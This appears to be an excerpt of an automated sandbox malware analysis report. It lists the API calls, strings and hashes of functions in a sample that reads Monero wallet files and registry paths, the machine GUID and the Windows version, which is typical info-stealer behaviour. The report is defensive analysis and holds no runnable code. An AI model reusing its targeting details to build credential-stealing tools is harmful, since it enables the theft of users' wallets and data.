                                                                                                                              • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                              • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                              • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                              • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                              • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00401C9D
                                                                                                                              • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                              • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeaplstrlen$CopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                                            • String ID: .keys$\Monero\wallet.keys
                                                                                                                            • API String ID: 615783205-3586502688
                                                                                                                            • Opcode ID: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
                                                                                                                            • Instruction ID: 0130a2ac35af31154b38bf277d642d4284bba686758d2f8fdbfb5a94e7082e10
                                                                                                                            • Opcode Fuzzy Hash: bd28ef697300de5884e94e1d673300fc32a7f2f0cccbe00ca3c3488f143d60c0
                                                                                                                            • Instruction Fuzzy Hash: C95160B1E9012D9BCF11EB25DD466DC7379AF04308F4054BAB608B3191DA78AFC98F58
                                                                                                                            Function 00415DF7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 120stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415E86
                                                                                                                              • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                            • lstrcatA.KERNEL32(?,00000000), ref: 00415EA3
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00415EC2
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00415ED6
                                                                                                                            • lstrcatA.KERNEL32(?), ref: 00415EE9
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00415EFD
                                                                                                                            • lstrcatA.KERNEL32(?), ref: 00415F10
                                                                                                                              • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                              • Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                              • Part of subcall function 00415B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
                                                                                                                              • Part of subcall function 00415B0B: HeapAlloc.KERNEL32(00000000), ref: 00415B37
                                                                                                                              • Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415B50
                                                                                                                              • Part of subcall function 00415B0B: FindFirstFileA.KERNEL32(?,?), ref: 00415B67
                                                                                                                              • Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
                                                                                                                              • Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
                                                                                                                              • Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415BC9
                                                                                                                              • Part of subcall function 00415B0B: CopyFileA.KERNEL32(?,?,00000001), ref: 00415C86
                                                                                                                              • Part of subcall function 00415B0B: DeleteFileA.KERNEL32(?), ref: 00415CA9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
                                                                                                                            • String ID: LzA
                                                                                                                            • API String ID: 1546541418-1388989900
                                                                                                                            • Opcode ID: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
                                                                                                                            • Instruction ID: 3907ee1014e8156982b731ec0efd03be7befdbbf2a83afad572f10a5b305f32e
                                                                                                                            • Opcode Fuzzy Hash: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
                                                                                                                            • Instruction Fuzzy Hash: AC51FBB1A0011C9BCF54DB64DC85ADDB7B9BB4C315F4044EAF609E3250EA35AB89CF58
                                                                                                                            Function 0040FB2D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
                                                                                                                            • _memset.LIBCMT ref: 0040FBC1
                                                                                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17
                                                                                                                              • Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: OpenProcess_memmove_memset
                                                                                                                            • String ID: N0ZWFt
                                                                                                                            • API String ID: 2647191932-431618156
                                                                                                                            • Opcode ID: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
                                                                                                                            • Instruction ID: eb1f70013287725bf786605e83da5f1b289e944c87060308bf9427b65ac1957a
                                                                                                                            • Opcode Fuzzy Hash: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
                                                                                                                            • Instruction Fuzzy Hash: 045191B1D0022C9FDB309F54DC85BDDB7B9AB44308F0001FAA609B7692D6796E89CF59
                                                                                                                            Function 00407FAC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60filememoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                            • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                            • LocalFree.KERNEL32(0040ECBC,?,?,?,?,0040E756,?,?,?), ref: 0040802B
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                            • String ID: V@
                                                                                                                            • API String ID: 2311089104-383300688
                                                                                                                            • Opcode ID: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
                                                                                                                            • Instruction ID: 10e4ee5bcd24e5c00d10c93a2cb3902743b6293cd5753d2e79081f11b23a5eb1
                                                                                                                            • Opcode Fuzzy Hash: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
                                                                                                                            • Instruction Fuzzy Hash: 47116070900204EFDF25DF64DD88EAF7BB9EB48741F20056AF481F2290EB769A85DB11
                                                                                                                            Function 004115D4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 48registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00411607
                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
                                                                                                                            • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?), ref: 00411657
                                                                                                                            • CharToOemA.USER32(?,?), ref: 0041166B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CharCloseOpenQueryValue_memset
                                                                                                                            • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                            • API String ID: 2235053359-1211650757
                                                                                                                            • Opcode ID: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
                                                                                                                            • Instruction ID: 75e31153c2228976b0cf0a8f1d4bbd960c746e32b60f2683a95406e25632d02a
                                                                                                                            • Opcode Fuzzy Hash: ef8e750435fd874f5544eab0802719870d73a3aabe5340ca703cc68e518caacf
                                                                                                                            • Instruction Fuzzy Hash: CC111EB590021DAFDB10DF90DC89FEAB7BDEB08309F4041E6A659E2052D7759F888F14
                                                                                                                            Function 00401A51 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 35registrymemoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401A6C
                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
                                                                                                                            • RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
                                                                                                                            • RegCloseKey.ADVAPI32(00401AE9), ref: 00401AAD
                                                                                                                            Strings
                                                                                                                            • SOFTWARE\monero-project\monero-core, xrefs: 00401A7F
                                                                                                                            • wallet_path, xrefs: 00401A9C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                            • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                                                                                            • API String ID: 3466090806-4244082812
                                                                                                                            • Opcode ID: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
                                                                                                                            • Instruction ID: a12903c7620fb5d6c8df92349d75cdfb1a5743fd57e0ed8a0c6fb3df1ac1df80
                                                                                                                            • Opcode Fuzzy Hash: 724872420e6656dc421950b0da405abf7eebffbf311253c609d29da366c3edf5
                                                                                                                            • Instruction Fuzzy Hash: ACF03075640304BFEB149B90DC0AFAA7A69DB44B06F141065B601B5190E6B66A509A24
                                                                                                                            Function 00410B30 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40registrymemoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B
                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B79
                                                                                                                            • RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B95
                                                                                                                            • RegCloseKey.ADVAPI32(00436888,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B9E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                            • String ID: Windows 11
                                                                                                                            • API String ID: 3466090806-2517555085
                                                                                                                            • Opcode ID: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
                                                                                                                            • Instruction ID: c636f12a4b9fd3341eb7223670fa9a8d4496e2c02347a6f2be12f88bf3247473
                                                                                                                            • Opcode Fuzzy Hash: e3368c902befc4cf7a45888ed36aa8236a31042c29ba286c6ff82d11e2c4ce16
                                                                                                                            • Instruction Fuzzy Hash: 1AF06875600304FBFF149BD1DC4AFAB7A7EEB4470AF1410A5F601D5190E7B6AA909714
                                                                                                                            Function 00410BA9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36registrymemoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BBD
                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BC4
                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410BE2
                                                                                                                            • RegQueryValueExA.KERNEL32(00436888,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ), ref: 00410BFD
                                                                                                                            • RegCloseKey.ADVAPI32(00436888,?,?,?,00410C1B,00410B58,?,?,?,00413E95,Windows: ,004368A0), ref: 00410C06
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                            • String ID: CurrentBuildNumber
                                                                                                                            • API String ID: 3466090806-1022791448
                                                                                                                            • Opcode ID: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
                                                                                                                            • Instruction ID: adfa9e2f60a12e4d5f9b95a3627e322926d469c0f3b43989f67d349f50e983ff
                                                                                                                            • Opcode Fuzzy Hash: c84c6eb54361118da4c3cf5dc7048b6cc90d818083839d71d976e1457e1e6126
                                                                                                                            • Instruction Fuzzy Hash: E9F09075640304BBEF159B90DC0AFAF7A7EEB44B06F240055F601A50A0E6B25A909B50
                                                                                                                            Function 0041566F Relevance: 9.1, APIs: 6, Instructions: 107registrystringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 004156A4
                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 004156C4
                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 004156EA
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004156F6
                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00415725
                                                                                                                            • lstrcatA.KERNEL32(?), ref: 00415738
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcat$CloseOpenQueryValue_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3891774339-0
                                                                                                                            • Opcode ID: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
                                                                                                                            • Instruction ID: 247fa685f6815e34cff7f8df4b350b2d93bc7a81ee75f5ea83cfe721da60279c
                                                                                                                            • Opcode Fuzzy Hash: 61c845370fa5e20ce0e4bed28fcb2d467033b3eb1257b194b560fd969d8f00f9
                                                                                                                            • Instruction Fuzzy Hash: 6941CE7194011D9FDF24EF60EC86EE8777ABB18309F4004AAB109A31A0EE759FC59F94
                                                                                                                            Function 00411757 Relevance: 9.1, APIs: 6, Instructions: 58commemoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                                                                            • CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                                                                            • _wtoi64.MSVCRT ref: 004117C1
                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2578673442.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
